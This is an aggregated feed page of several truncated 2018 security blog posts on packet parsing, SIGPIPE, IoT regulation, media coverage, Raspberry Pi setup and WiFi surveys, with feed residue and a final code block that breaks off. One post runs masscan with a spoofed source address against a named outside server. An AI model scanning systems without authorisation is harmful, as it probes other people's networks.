The first thing you need to unlearn is byte-swapping. I know that this was some sort of epiphany you had when you learned network programming, but byte-swapping is wrong. If you find yourself using a macro to swap bytes, like the be16toh() macro used in this code, then you are doing it wrong.

But, you say, the network byte-order is big-endian, while today's Intel and ARM processors are little-endian. So you have to swap bytes, don't you?

No. As proof of the matter I point to every other language other than C/C++. They don't swap bytes. Their internal integer format is undefined. Indeed, something like JavaScript may be storing numbers as floating point. You can't muck around with the internal format of their integers even if you wanted to.

An example of byte swapping in the code is something like this:

In this code, it's taking a buffer of raw bytes from the DHCPv6 packet and "casting" it as a C internal structure. The packet contains a two-byte big-endian length field, "option->len", which the code must byte-swap in order to use.

Among the errors here is casting an internal structure over external data. From an abstract theory point of view, this is wrong. Internal structures are undefined.
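To make the contrast concrete, here's a sketch of the byte-at-a-time alternative: reading the big-endian length directly out of the byte buffer and validating it against the packet length before trusting it. The function names and offsets are hypothetical, for illustration only (this is not systemd's actual code, and the field layout is not a full DHCPv6 parser):

```c
#include <stddef.h>

/* Read a two-byte big-endian integer from a raw byte buffer.
 * No byte-swapping macros, no struct overlays: the same code is
 * correct on big-endian and little-endian CPUs alike. */
unsigned parse_be16(const unsigned char *buf, size_t offset)
{
    return (unsigned)buf[offset] << 8 | buf[offset + 1];
}

/* Rigorously verify external data before trusting it: the length
 * field must never be allowed to point past the end of the packet.
 * Returns 0 on success, -1 if the packet is malformed. */
int parse_option_len(const unsigned char *buf, size_t buflen,
                     size_t offset, unsigned *len)
{
    if (offset + 2 > buflen)
        return -1; /* truncated packet: reject, don't cast and hope */
    *len = parse_be16(buf, offset);
    if (offset + 2 + *len > buflen)
        return -1; /* option claims more bytes than the packet holds */
    return 0;
}
```

The point is that the parser never looks at the bytes through an internal structure at all, so there is nothing to byte-swap and no blurred boundary between external and internal data.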
Just because you can sort of know the definition in C/C++ doesn't change the fact that they are still undefined.

From a practical point of view, this leads to confusion, as the programmer is never quite clear as to the boundary between external and internal data. You are supposed to rigorously verify external data, because the hacker controls it. You don't keep double-checking and second-guessing internal data, because that would be stupid. When you blur the lines between internal and external data, then your checks get muddled up.

Yes you can, in C/C++, cast an internal structure over external data. But just because you can doesn't mean you should. What you should do instead is parse data the same way as if you were writing code in JavaScript. For example, to grab the DHCP6 option length field, you should write something like:

(2018-10-27, https://blog.erratasec.com/2018/10/systemd-is-bad-parsing-and-should-feel.html)

Masscan as a lesson in TCP/IP

For example, here is a screenshot of running masscan to scan a single target from my laptop computer. My machine has an IP address of 10.255.28.209, but masscan runs with an address of 10.255.28.250. This works fine, with the program contacting the target computer and downloading information -- even though it has the 'wrong' IP address. That's because it isn't using the network stack of the notebook computer, and hence, not using the notebook's IP address. Instead, it has its own network stack and its own IP address.

At this point, it might be useful to describe what masscan is doing here. It's a "port scanner", a tool that connects to many computers and many ports to figure out which ones are open.
In some cases, it can probe further: once it connects to a port, it can grab banners and version information.

In the above example, the parameters to masscan used here are:

-p80 : probe for port "80", which is the well-known port assigned for web-services using the HTTP protocol

--banners : do a "banner check", grabbing simple information from the target depending on the protocol. In this case, it grabs the "title" field from the HTML from the server, and also grabs the HTTP headers. It does different banners for other protocols.

--source-ip 10.255.28.250 : this configures the IP address that masscan will use

172.217.197.113 : the target to be scanned. This happens to be a Google server, by the way, though that's not really important.

Now let's change the IP address that masscan is using to something completely different, like 1.2.3.4. The difference from the above screenshot is that we no longer get any data in response. Why is that?

(2018-10-23, https://blog.erratasec.com/2018/10/masscan-as-lesson-in-tcpip.html)

Some notes for journalists about cybersecurity

The recent Bloomberg article about Chinese hacking of motherboards is a great opportunity to talk about problems with journalism.

Journalism is about telling the truth, not a close approximation of the truth, but the true truth. They don't do a good job at this in cybersecurity.

Take, for example, a recent incident where the Associated Press fired a reporter for photoshopping his shadow out of a photo. The AP took a scorched-earth approach, not simply firing the photographer, but removing all his photographs from their library.

That's because there is a difference between truth and near truth.

Now consider Bloomberg's story, such as a photograph of a tiny chip. Is that a photograph of the actual chip the Chinese inserted into the motherboard?
Or is it another chip, representing the size of the real chip? Is it truth or near truth?

Or consider the technical details in Bloomberg's story. They are garbled, as this discussion shows. Something like what Bloomberg describes is certainly plausible; something exactly like what Bloomberg describes is impossible. Again there is the question of truth vs. near truth.

There are other near truths involved. For example, we know that supply chains often replace high-quality expensive components with cheaper, lower-quality knockoffs. It's perfectly plausible that some of the incidents Bloomberg describes are that known issue, which they are then hyping as being hacker chips. This demonstrates how truth and near truth can be quite far apart, telling very different stories.

Another example is a NYTimes story about a terrorist's use of encryption. As I've discussed before, the story has numerous "near truth" errors. The NYTimes story is based upon a transcript of an interrogation of the hacker. The French newspaper Le Monde published excerpts from that interrogation, with details that differ slightly from the NYTimes article.

One of the justifications journalists use is that near truth is easier for their readers to understand. First of all, that's no justification for falsehoods. If the words mean something else, then it's false. It doesn't matter if it's simpler. Secondly, I'm not sure they actually are easier to understand. It's still techy gobbledygook. In the Bloomberg article, if I as an expert can't figure out what actually happened, then I know that the average reader can't, either, no matter how much you've "simplified" the language.

Stories can solve this by both giving the actual technical terms that experts can understand, then explaining them. Yes, it eats up space, but if you care about the truth, it's necessary.

In groundbreaking stories like Bloomberg's, the length is already enough that the average reader won't slog through it.
Instead, it becomes a seed for lots of other coverage that explains the story. In such cases, you want to get the techy details, the actual truth, correct, so that we experts can stand behind the story and explain it. Otherwise, going for the simpler near truth means that all us experts simply question the veracity of the story.

The companies mentioned in the Bloomberg story have called it an out…

(2018-10-22, https://blog.erratasec.com/2018/10/some-notes-for-journalists-about.html)

TCP/IP, Sockets, and SIGPIPE

This description is accurate. The "Sockets" network API was based on the "pipes" interprocess communication when TCP/IP was first added to the Unix operating system back in 1981. This made it straightforward and comprehensible to the programmers at the time. This SIGPIPE behavior made sense when piping the output of one program to another program on the command-line, as is typical under Unix: if the receiver of the data crashes, then you want the sender of the data to also stop running. But it's not the behavior you want for networking. Server processes need to continue running even if a client crashes.

But Stevens's description is insufficient. It portrays this problem as optional, one that only exists if the other side of the connection is misbehaving. He never mentions the problem outside this section, and none of his example code handles the problem. Thus, if you base your code on Stevens's, it'll inherit this problem and sometimes crash.

The simplest solution is to configure the program to ignore the signal, such as putting the following line of code in your main() function:

    signal(SIGPIPE, SIG_IGN);

If you search popular projects, you'll find this solution there most of the time, such as in openssl.

But there is a problem with this approach, as OpenSSL demonstrates: it's both a command-line program and a library.
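One way a library can cope without touching the application's signal handlers is to wrap send() itself, using the platform-specific mechanisms (Linux's MSG_NOSIGNAL flag, BSD's SO_NOSIGPIPE socket option). This is a hedged sketch with a hypothetical function name, not OpenSSL's or any real library's code:

```c
#include <sys/types.h>
#include <sys/socket.h>

/* On platforms without MSG_NOSIGNAL (e.g. BSD/macOS), define it away
 * and rely on the per-socket SO_NOSIGPIPE option instead. */
#ifndef MSG_NOSIGNAL
#define MSG_NOSIGNAL 0
#endif

/* Send without ever raising SIGPIPE: a broken connection is reported
 * as -1/EPIPE instead of killing the process. */
ssize_t send_nosigpipe(int fd, const void *buf, size_t len)
{
#ifdef SO_NOSIGPIPE
    int one = 1;
    setsockopt(fd, SOL_SOCKET, SO_NOSIGPIPE, &one, sizeof(one));
#endif
    return send(fd, buf, len, MSG_NOSIGNAL);
}
```

Setting the option on every send is wasteful; a real library would set SO_NOSIGPIPE once, right after socket() or accept(), which is exactly the placement discussed next.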
The command-line program handles this error, but the library doesn't. This means that using the SSL_write() function to send encrypted data may encounter this error. Nowhere in the OpenSSL documentation does it mention that the user of the library needs to handle this.

Ideally, library writers would like to deal with the problem internally. There are platform-specific ways to deal with this. On Linux, an additional parameter MSG_NOSIGNAL can be added to the send() function. On BSD (including macOS), setsockopt(SO_NOSIGPIPE) can be configured for the socket when it's created (after socket() or after accept()). On Windows and some other operating systems, the SIGPIPE isn't even generated, so nothing needs to be done for those platforms.

But it's difficult. Browsing through cross-platform projects like curl, which tries this library technique, I see the following bit:

#ifdef __SYMBIAN32__
/* This isn't actually supported under Symbian OS */
#undef SO_NOSIGPIPE

(2018-10-21, https://blog.erratasec.com/2018/10/tcpip-sockets-and-sigpipe.html)

Election interference from Uber and Lyft

Uber and Lyft have announced that they'll provide free rides to the polls on election day. This well-meaning gesture nonetheless calls into question how this might influence the election.

"Free rides" to the polls is a common thing. Taxi companies have long offered such services for people in general. Political groups have long offered such services for their constituencies in particular.
Political groups target retirement communities to get them to the polls; black churches have long had their "Souls to the Polls" program across the 37 states that allow early voting on Sundays.

But with Uber and Lyft getting into this, we now have concerns about "big data", "algorithms", and "hacking".

As the various Facebook controversies have taught us, these companies have a lot of data on us that can reliably predict how we are going to vote. If their leaders wanted to, these companies could use this information in order to get those on one side of an issue to the polls. On hotly contested elections, it wouldn't take much to swing the result to one side.

Even if they don't do this consciously, their various algorithms (often based on machine learning and AI) may do so accidentally. As is frequently demonstrated, unconscious biases can lead to real world consequences, like facial recognition systems being unable to read Asian faces.

Lastly, it makes these companies prime targets for Russian hackers, who may take all this into account when trying to muck with elections. Or indeed, to simply claim that they did in order to call the results into question. Though to be fair, Russian hackers have so many other targets of opportunity. Messing with the traffic lights of a few cities would be enough to swing a presidential election, by specifically targeting areas with certain voters, creating traffic jams that make it difficult for them to get to the polls.

Even if it's not "hackers" as such, many will want to game the system. For example, politically motivated drivers may choose to loiter in neighborhoods strongly on one side or the other, helping the right sorts of people vote at the expense of not helping the wrong people. Likewise, drivers might skew the numbers by deliberately hailing rides out of opposing neighborhoods and taking them out of town, or to the right sorts of neighborhoods.

I'm trying to figure out which Party this benefits the most.
Let's take a look at rider demographics to start with, such as this post. It appears that income levels and gender are roughly evenly distributed.

Ridership is skewed urban, with riders being 46% urban, 48% suburban, and 6% rural. In contrast, US population is 31% urban, 55% suburban, and 15% rural. Given the increasing polarization among rural and urban voters, this strongly skews results in favor of Democrats.

Likewise, the above numbers show that Uber ridership is strongly skewed to the younger generation, with 55% of the riders 34 and younger. This again strongly skews "free rides" by Uber and Lyft toward the Democrats. Though to be fair, the "over 65" crowd has long had an advantage, as the parties have fallen over themselves to bus people from retirement communities to the polls (and older people can get free time on weekdays to vote).

Even if you are on the side that appears to benefit, this should still concern you. Our allegiance should first be to a robust and fair…

(2018-10-19, https://blog.erratasec.com/2018/10/election-interference-from-uber-and-lyft.html)

Notes on the UK IoT cybersec "Code of Practice"

(2018-10-16, https://blog.erratasec.com/2018/10/notes-on-uk-iot-cybersec-code-of.html)

How to irregular cyber warfare

The Grugq (@thegrugq) pointed me to this article on "Lessons on Irregular Cyber Warfare", citing the masters like Sun Tzu, von Clausewitz, Mao, Che, and the usual characters.
It tries to answer:

...as an insurgent, which is in a weaker power position vis-a-vis a stronger nation state; how does cyber warfare play an integral part in the irregular cyber conflicts in the twenty-first century between nation-states and violent non-state actors or insurgencies

I thought I'd write a rebuttal.

None of these people provide any value. If you want to figure out cyber insurgency, then you want to focus on the technical "cyber" aspects, not "insurgency". I regularly read military articles about cyber, written by those like in the above article, which demonstrate little experience in cyber.

The chief technical lesson for the cyber insurgent is the Birthday Paradox. Let's say, hypothetically, you go to a party with 23 people total. What's the chance that any two people at the party have the same birthday? The answer is 50.7%. With a party of 75 people, the chance rises to 99.9% that two will have the same birthday.

The paradox is that your intuitive way of calculating the odds is wrong. You are thinking the odds are like those of somebody having the same birthday as yourself, which is indeed roughly 23 out of 365. But we aren't talking about you vs. the remainder of the party, we are talking about any possible combination of two people. This dramatically changes how we do the math.

In cryptography, this is known as the "Birthday Attack". One crypto task is to uniquely fingerprint documents. Historically, the most popular way of doing this was with an algorithm known as "MD5" which produces 128-bit fingerprints. Given a document with an MD5 fingerprint, it's impossible to create a second document with the same fingerprint. However, with MD5, it's possible to create two documents with the same fingerprint. In other words, we can't modify only one document to get a match, but we can keep modifying two documents until their fingerprints match.
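The party numbers are easy to verify: the chance that n people all have distinct birthdays is 365/365 × 364/365 × 363/365 × …, and the collision probability is one minus that product. A quick sketch:

```c
/* Probability that at least two of n people share a birthday,
 * assuming 365 equally likely days. */
double birthday_collision(int n)
{
    double p_unique = 1.0; /* probability all n birthdays differ */
    for (int i = 0; i < n; i++)
        p_unique *= (365.0 - i) / 365.0;
    return 1.0 - p_unique;
}
```

For n = 23 this evaluates to about 0.507, and for n = 75 to about 0.9997, matching the 50.7% and 99.9% figures above.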
As with the party, finding somebody with your birthday is hard; finding any two people with the same birthday is easier.

The same principle works with insurgencies. Accomplishing one specific goal is hard, but accomplishing any goal is easy. Trying to do a narrowly defined task to disrupt the enemy is hard, but it's easy to support a group of motivated hackers and let them do any sort of disruption they can come up with.

The above article suggests a means of using cyber to disrupt a carrier attack group. This is an example of something hard, a narrowly defined attack that is unlikely to actually work in the real world.

Conversely, consider the attacks attributed to North Korea, like those against Sony or the Wannacry virus. These aren't the careful planning of a small state actor trying to accomplish specific goals. These are the actions of an actor that supports hacker groups, and lets them loose without a lot of oversight and direction. Wannacry in particular is an example of an undirected cyber attack. We know from our experience with network worms that its effects were impossible to predict. Somebody just stuck the newly discovered NSA EternalBlue payload into an existing virus framework and let it run to see what happens. As we worm experts know, nobody could have predicted the results of doing so, not even its creators.

Another example is the DNC election hacks. The reason we can attribute them to Russia is because it wasn't their narrow goal. Instead, by looking at things like their URL shortener, we can see that they flailed around broadly all over cyberspace. The DNC was just one of their…

(2018-10-14, https://blog.erratasec.com/2018/10/how-to-irregular-cyber-warfare.html)

Notes on the Bloomberg Supermicro supply chain hack story

The story is based on anonymous sources, and not even good anonymous sources.
An example is this attribution:

a person briefed on evidence gathered during the probe says

That means somebody not even involved, but somebody who heard a rumor. It also doesn't mean the person even had sufficient expertise to understand what they were being briefed about.

The technical detail that's missing from the story is that the supply chain is already messed up with fake chips rather than malicious chips. Reputable vendors spend a lot of time ensuring quality, reliability, tolerances, ability to withstand harsh environments, and so on. Even the simplest of chips can command a price premium when they are well made.

What happens is that other companies make clones that are cheaper and lower quality. They are just good enough to pass testing, but fail in the real world. They may not even be completely fake chips. They may be bad chips the original manufacturer discarded, or chips the night shift at the factory secretly ran through on the equipment -- but with less quality control.

The supply chain description in the Bloomberg story is accurate, except that it fails to discuss how these cheap, bad chips frequently replace the more expensive chips, with contract manufacturers or managers skimming off the profits. Replacement chips are real, but whether they are for malicious hacking or just theft is the sticking point.

For example, consider this listing for a USB-to-serial converter using the well-known FTDI chip. The word "genuine" is in the title, because fake FTDI chips are common within the supply chain. As you can see from the $11 price, the amount of money you can make with fake chips is low -- these contract manufacturers hope to make it up in volume.

The story implies that Apple is lying in its denials of malicious hacking, and deliberately avoids this other supply chain issue.
It's perfectly reasonable for Apple to have rejected Supermicro servers because of bad chips that have nothing to do with hacking.

If there's hacking going on, it may not even be Chinese intelligence -- the manufacturing process is so lax that any intelligence agency could be responsible. Just because most manufacturing of server motherboards happens in China doesn't point the finger to Chinese intelligence as being the ones responsible.

Finally, I want to point out the sensationalism of the story. It spends much effort focusing on the invisible nature of small chips, as evidence that somebody is trying to hide something. That the chips are so small means nothing: except for the major chips, all the chips on a motherboard are small. It's hard to have large chips, except for the big things like the CPU and DRAM. Serial ROMs containing firmware are never going to be big, because they just don't hold that much information.

A fake serial ROM is the focus here not so much because that's the chip they found by accident, but because that's the chip they'd look for. The chips contain the firmware for other hardware devices on the motherboard. Thus, instead of designing complex hardware to do malicious things, a hacker simply has to make simple changes t…

(2018-10-04, https://blog.erratasec.com/2018/10/notes-on-bloomberg-supermicro-supply.html)

Mini pwning with GL-iNet AR150

Unfortunately, these devices had extraordinarily limited memory (16-megabytes) and even more limited storage (4-megabytes). That's megabytes -- the typical size of an SD card in an RPi is a thousand times larger.

I'm interested in that device for the simple reason that it has a big-endian CPU.

All these IoT-style devices these days run ARM and MIPS processors, with a smattering of others like x86, PowerPC, ARC, and AVR32. ARM and MIPS CPUs can run in either mode, big-endian or little-endian.
Linux can be compiled for either mode. Little-endian is by far the most popular mode, because of Intel's popularity. Code developed on little-endian computers sometimes has subtle bugs when recompiled for big-endian, so it's best just to maintain the same byte-order as Intel. On the other hand, popular file-formats and crypto-algorithms use big-endian, so there's some efficiency to be gained by going with that choice.

I'd like to have a big-endian computer around to test my code with. In theory, it should all work fine, but as I said, subtle bugs sometimes appear.

The problem is that the base Linux kernel has slowly grown so big I can no longer get things to fit on the WR703N, not even to the point where I can add extra storage via the USB drive. I've tried to hack a firmware but succeeded only in bricking the device.

An alternative is the GL-AR150. This is a company who sells commercial WiFi products like the other vendors, but who caters to hackers and hobbyists. Recognizing the popularity of that TP-LINK device, they essentially made a clone with more stuff, with 16-megabytes of storage and 64-megabytes of RAM. They intend for people to rip off the case and access the circuit board directly: they've included the pins for a console serial port to be directly connected, connectors for additional WiFi antennas, and pads for soldering wires to GPIO pins for hardware projects. It's a thing of beauty.

So this post is about the steps I took to get things working for myself.

The first step is to connect to the device. One way to do this is to connect the notebook computer to their WiFi, then access their web-based console. Another way is to connect to their "LAN" port via Ethernet. I chose the Ethernet route.

The problem with their Ethernet port is that you have to manually set your IP address. Their address is 192.168.8.1.
I handled this by going into the Linux virtual-machine on my computer, putting the virtual network adapter into "bridge" mode (as I always do anyway), and setting an alternate IP address:

# ifconfig eth0:1 192.168.8.2 netmask 255.255.255.0

The firmware I want to install is from the OpenWRT project, which maintains Linux firmware replacements for over a hundred different devices. The device actually already uses their own variation of OpenWRT, but still, rather than futz with theirs I want to go with a vanilla installation.

https://wiki.openwrt.org/toh/gl-inet/gl-ar150

I download this using the browser in my Linux VM, then browse to 19…

(2018-09-28, https://blog.erratasec.com/2018/09/mini-pwning-with-gl-inet-ar150.html)

California's bad IoT law

California has passed an IoT security bill, awaiting the governor's signature/veto. It's a typically bad bill based on a superficial understanding of cybersecurity/hacking that will do little to improve security, while doing a lot to impose costs and harm innovation.

It's based on the misconception of adding security features. It's like dieting, where people insist you should eat more kale, which does little to address the problem of pigging out on potato chips. The key to dieting is not eating more but eating less. The same is true of cybersecurity, where the point is not to add "security features" but to remove "insecure features". For IoT devices, that means removing listening ports and cross-site/injection issues in web management. Adding features is typical "magic pill" or "silver bullet" thinking that we spend much of our time in infosec fighting against.

We don't want arbitrary features like firewall and anti-virus added to these products. It'll just increase the attack surface, making things worse. The one possible exception to this is "patchability": some IoT devices can't be patched, and that is a problem.
But even here, it's complicated. Even if IoT devices are patchable in theory, there is no guarantee vendors will supply such patches, or worse, that users will apply them. Users overwhelmingly forget about devices once they are installed. These devices aren't like phones/laptops, which notify users about patching.

You might think a good solution to this is automated patching, but only if you ignore history. Many rate "NotPetya" as the worst, most costly, cyberattack ever. That was launched by subverting an automated patch. Most IoT devices exist behind firewalls, and are thus very difficult to hack. Automated patching gets beyond firewalls; it makes it much more likely mass infections will result from hackers targeting the vendor. The Mirai worm infected fewer than 200,000 devices. A hack of a tiny IoT vendor can gain control of more devices than that in one fell swoop.

The bill does target one insecure feature that should be removed: hardcoded passwords. But they get the language wrong. A device doesn't have a single password, but many things that may or may not be called passwords. A typical IoT device has one system for creating accounts on the web management interface, a wholly separate authentication system for services like Telnet (based on /etc/passwd), and yet another wholly separate system for things like debugging interfaces. Just because a device does the prescribed thing of using a unique or user-generated password in the user interface doesn't mean it doesn't also have a bug in Telnet.

That was the problem with devices infected by Mirai. The description that these were hardcoded passwords reflects only a superficial understanding of the problem. The real problem was that there were different authentication systems in the web interface and in other services like Telnet. Most of the devices vulnerable to Mirai did the right thing on the web interfaces (meeting the language of this law), requiring the user to create new passwords before operating.
They just did the wrong thing elsewhere.People aren't really paying attention to what happened with Mirai. They look at the 20 billion new IoT devices that are going to be connected to the Internet by 2020 and believe Mirai is just the tip of the iceberg. But it isn't. The IPv4 Internet has only 4 billion addresses, which are pretty much already used up. This means those 20 billion won't be exposed to the public Internet like Mirai devices, but hidden behind firewalls that translate addresses. Thus, rather than Mirai presaging the future, it represents the last gasp of the past that is unlikely to come again.This law is backwards looking rather than forward looking. Forward looking, by far the most important t]]> 2018-09-10T17:33:17+00:00 https://blog.erratasec.com/2018/09/californias-bad-iot-law.html www.secnews.physaphae.fr/article.php?IdArticle=802142 False Hack,Threat,Patching,Guideline Tesla,NotPetya None Errata Security - Errata Security Debunking Trump\'s claim of Google\'s SOTU bias #StopTheBias pic.twitter.com/xqz599iQZw- Donald J. Trump (@realDonaldTrump) August 29, 2018The evidence still exists at the Internet Archive (aka. "Wayback Machine") that archives copies of websites. That was probably how that Trump video was created, by using that website. We can indeed see that for Obama's SotU speeches, Google promoted them, such as this example of his January 12, 2016 speech:And indeed, if we check for Trump's January 30, 2018 speech, there's no such promotion on Google's homepage:But wait a minute, Google claims they did promote it, and there's even a screenshot on Reddit proving Google is telling the truth. Doesn't this disprove Trump?No, it actually doesn't, at least not yet. It's comparing two different things. In the Obama example, Google promoted hours ahead of time that there was an upcoming event. In the Trump example, they didn't do that. 
Only once the event went live did they mention it.I failed to notice this in my examples above because the Wayback Machine uses GMT timestamps. At 9pm EST when Trump gave his speech, it was 2am the next day in GMT. So picking the Wayback page from January 31st we do indeed see the promotion of the live event.Thus, Trump still seems to have a point: Google promoted Obama's speech better. They promoted his speeches hours ahead of time, but Trump's only after they went live.But ho]]> 2018-08-29T22:22:49+00:00 https://blog.erratasec.com/2018/08/debunking-trumps-claim-of-googles-sotu.html www.secnews.physaphae.fr/article.php?IdArticle=785218 False None None None Errata Security - Errata Security Provisioning a headless Raspberry Pi Burning micro SD cardWe are going to edit the SD card before booting, so for completeness, I thought I'd describe the process of burning an SD card.We are going to download the latest "raspbian" operating system. I download the "lite" version because I'm not using the desktop features. It comes as a compressed .zip file which we need to extract into an .img file. Just double-click on the .zip on Windows or Mac.The next step is to burn the image to an SD card. On Windows I use Win32DiskImager. On Mac I use the following command-line steps:$ sudo -s# mount# diskutil unmount /dev/disk2s1# dd bs=1m if=~/Downloads/2018-06-27-raspbian-stretch-lite.img of=/dev/disk2 conv=syncFirst, I need a root prompt. I then use the mount command to find out where the micro SD card is mounted in the file system. It's usually /dev/disk2s1, but could be disk3 or disk4 depending upon other things that may already be mounted on my Mac, such as USB drives or dmg files. It's important to know the correct drive because the dd utility is unforgiving of mistakes and can wipe out your entire drive. For gosh's sake, don't use disk1!!!! 
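The copy step itself is just block-at-a-time writing; here is a minimal Python stand-in for the dd invocation above (a toy sketch that writes to ordinary files, never a real /dev device; the 1 MiB block size mirrors bs=1m):

```python
import os
import tempfile

BLOCK = 1024 * 1024  # mirror dd's bs=1m

def burn(image_path, target_path):
    """Copy an image to a target in 1 MiB blocks, roughly what dd does."""
    copied = 0
    with open(image_path, "rb") as src, open(target_path, "wb") as dst:
        while chunk := src.read(BLOCK):
            dst.write(chunk)
            copied += len(chunk)
        dst.flush()
        os.fsync(dst.fileno())  # make sure the data lands before "ejecting"
    return copied

# Self-demo on throwaway temp files -- never point anything like this at /dev/disk2:
src_path = os.path.join(tempfile.gettempdir(), "demo.img")
dst_path = os.path.join(tempfile.gettempdir(), "demo.out")
with open(src_path, "wb") as f:
    f.write(os.urandom(3 * BLOCK + 123))  # deliberately not block-aligned
copied = burn(src_path, dst_path)
```

The logic is trivial; the hazard dd adds is that its target is a raw device node, which is exactly why picking the wrong disk number is catastrophic.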
Remember dd stands for danger-danger (well, many claim it stands for disk-dump, but seriously, it's dangerous).The next step is to unmount the drive. Instead of the Unix umount utility, use the macOS diskutil unmount tool.Now we use good ol' dd to copy the image over. The above example is my recently downloaded raspbian image that's two months old. When you do this, it'll be a newer version with a different file name, so look in your ~/Downloads folder for the correct name.This takes a while to write to the SD card. You can type [ctrl-T] to see progress if you want.When we are done writing, don't eject the card. We are going to edit the contents as described below before we stick it into our Raspberry Pi. After running dd, it's going to become automatically mounted on your Mac; on mine it comes up as /Volumes/boot. When I say "root directory of the SD card" in the instructions below, I mean that directory.Troubleshooting: If you get the "Resource busy" error when running dd, it means you didn't unmount the drive. Go back and run diskutil unmount /dev/disk2s1 (or equivalent for whatever mount tells you which drive the SD card is using).You can use the "raw" disk instead of the normal disk, such as /dev/rdisk2. I don't know what the tradeoffs are.EthernetThe RPi B comes with Ethernet built-in]]> 2018-08-27T01:56:09+00:00 https://blog.erratasec.com/2018/08/provisioning-headless-raspberry-pi.html www.secnews.physaphae.fr/article.php?IdArticle=783004 False Guideline None None Errata Security - Errata Security DeGrasse Tyson: Make Truth Great Again August 20, 2018When people make comparisons with Orwell's "Ministry of Truth", he obtusely persists:A good start:  The National Academy of Sciences, which “…provides objective, science-based advice on critical issues affecting the nation."- Neil deGrasse Tyson (@neiltyson) August 20, 2018Given that Orwellian dystopias were the theme of this summer's DEF CON hacker conference, let's explore what's wrong with this idea.Truth vs.
"Truth"I work in a corrupted industry, variously known as the "infosec" community or "cybersecurity" industry. It's a great example of how truth is corrupted into "Truth".At a recent government policy meeting, I pointed out how vendors often downplay the risk of bugs (vulnerabilities that can be exploited by hackers). When vendors are notified of these bugs and release a patch to fix them, they often give a risk rating. These ratings are often too low, in order to protect the corporate reputation. The representative from Oracle claimed that they didn't do that, and that indeed, they'll often overestimate the risk. Other vendors chimed in, also claiming they rated the risk higher than it really was.In a neutral world, deliberately overestimating the risk would be the same falsehood as deliberately underestimating it. But we live in a non-neutral world, where only one side is a lie, the middle is truth, and the other side is "Truth". Lying in the name of the "Truth" is somehow acceptable.Moreover, Oracle is famous for having downplayed the risk of significant bugs in the past, and is well-known in the industry as being the least trustworthy vendor as far as security of their products is concerned. Much of their policy effort in Washington D.C. is focused on preventing their dirty laundry from being exposed. They aren't simply another vendor promoting "Truth", but one deliberately exploiting "Truth" to corrupt ends.That we should exaggerate the risks of cybersecurity, deliberately lie to people for their own good, is the uncontroversial consensus of our infosec/cybersec community. Most do it, few think this is wrong. Security is a moral imperative that justifies "Truth".The National Academy of SciencesSo are we getting the truth or "Truth" from organizations like the National Academy of Sciences?The question here isn't global warming. That mankind's carbon emissions warm the climate is truth.
We have a good understanding of how greenhouse gases work, as well as many measures of the climate showing that warming is occurring. The Arctic is steadily losing ice each summer.Instead, the question is "Global Warming", the claims made by politicians on the subject. Do politicians on the left fairly represent the truth, or are they the "Truth"?Which side is the National Academy of Sciences on? Are they committed to the truth, or (like the infosec/cybersec community) are they pursuing "Truth"? Is global warming a moral imperative that justifies playing loose with the facts?Googling "national academy of sciences climate chang]]> 2018-08-20T16:06:46+00:00 https://blog.erratasec.com/2018/08/degrasse-tyson-make-truth-great-again.html www.secnews.physaphae.fr/article.php?IdArticle=782647 False Guideline APT 32 None Errata Security - Errata Security That XKCD on voting machine software is wrong Accidents vs. attackThe biggest flaw is that the comic confuses accidents vs. intentional attack. Airplanes and elevators are designed to avoid accidental failures. If that's the measure, then voting machine software is fine and perfectly trustworthy. Such machines are no more likely to accidentally record a wrong vote than the paper voting systems they replaced -- indeed less likely. The reason we have electronic voting machines in the first place was the "hanging chad" problem in the Bush v. Gore election of the year 2000. After that election, a wave of new, software-based voting machines replaced the older inaccurate paper machines.The question is whether software voting machines can be attacked. Well, if that's the measure, then airplanes aren't safe at all. Security against human attack consists of the entire infrastructure outside the plane, ranging from the TSA forcing us to take off our shoes to trade restrictions preventing the proliferation of Stinger missiles.Confusing the two, accidents vs. attack, works here because it makes the reader feel superior.
We get to mock and feel superior to those stupid software engineers for not living up to what's essentially a fictional standard of reliability.To repeat: software machines are better than the mechanical machines they replaced, which is why there are so many software-based machines in the United States. The issue isn't normal accuracy, but their robustness against a different standard, against attack -- a standard which airplanes and elevators suck at.The problems are as much hardware as softwareLast year at the DEF CON hacking conference they had an "Election Hacking Village" where they hacked a number of electronic voting machines. Most of those "hacks" were against the hardware, such as soldering on a JTAG device or accessing USB ports. Other errors involved voting machines sold on eBay whose data wasn't wiped, allowing voter records to be recovered.What we want to see is hardware designed more like an iPhone, where the FBI can't decrypt a phone even when they really really want to. This requires special chips, such as secure enclaves, signed boot loaders, and so on. Only once we get the hardware right can we complain about the software being deficient.To be fair, software problems were also found at DEF CON, like an exploit over WiFi. Though for many problems it's questionable whether the fault lies in the software design or the hardware design; they are fixable in either one. The situation is better described as the entire design being flawed, from the "requirements", to the high-level system "architecture", and lastly to the actual "software" code.It's lack of accountability/fail-safesWe imagine the threat is that votes can be changed in the voting machine, but it's more profound than that. The problem is that votes can be changed invisibly. The first change experts want to see is adding a paper trail, rather than fixing bugs.Consider "recounts". With many of today's electronic voting machines, this is meaningless, with nothing to recount.
The machine produces a number, and we have nothing else to test against whether that number is correct or fa]]> 2018-08-08T20:09:17+00:00 https://blog.erratasec.com/2018/08/that-xkcd-on-voting-machine-software-is.html www.secnews.physaphae.fr/article.php?IdArticle=771991 False Hack,Threat None None Errata Security - Errata Security What the Caesars (@DefCon) WiFi situation looks like When we go to DEF CON in Vegas, hundreds of us bring our WiFi tools to look at the world. Actually, no special hardware is necessary, as modern laptops/phones have WiFi built-in, while the operating system (Windows, macOS, Linux) enables “monitor mode”. Software is widely available and free. We still love our specialized WiFi dongles and directional antennas, but they aren't really needed anymore.It's also legal, as long as you are just grabbing header information and broadcasts. Which is about all that's useful anymore as encryption has become the norm -- we can pretty much only see what we are allowed to see. The days of grabbing somebody's session-cookie and hijacking their web email are long gone (though that was a fun period). There are still a few targets around if you want to WiFi hack, but most are gone.So naturally I wanted to do a survey of what Caesar's Palace has for WiFi during the DEF CON hacker conference located there.Here is a list of access-points (on channel 1 only) sorted by popularity, the number of stations using them. These have mind-blowingly high numbers in the ~3000 range for “CAESARS”. I think something is wrong with the data.I click on the first one to drill down, and I find a source of the problem. I'm seeing only “Data Out” packets from these devices, not “Data In”.These are almost entirely ARP packets from devices, associated with other access-points, not actually associated with this access-point. The hotel has bridged (via Ethernet) all the access-points together.
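Decoding such an ARP packet takes only a couple of dozen bytes; here is a sketch of parsing the 28-byte IPv4 ARP body (the packet bytes and MAC below are synthetic, but the 10.10.0.1 gateway matches the capture described here):

```python
import struct

def parse_arp(body):
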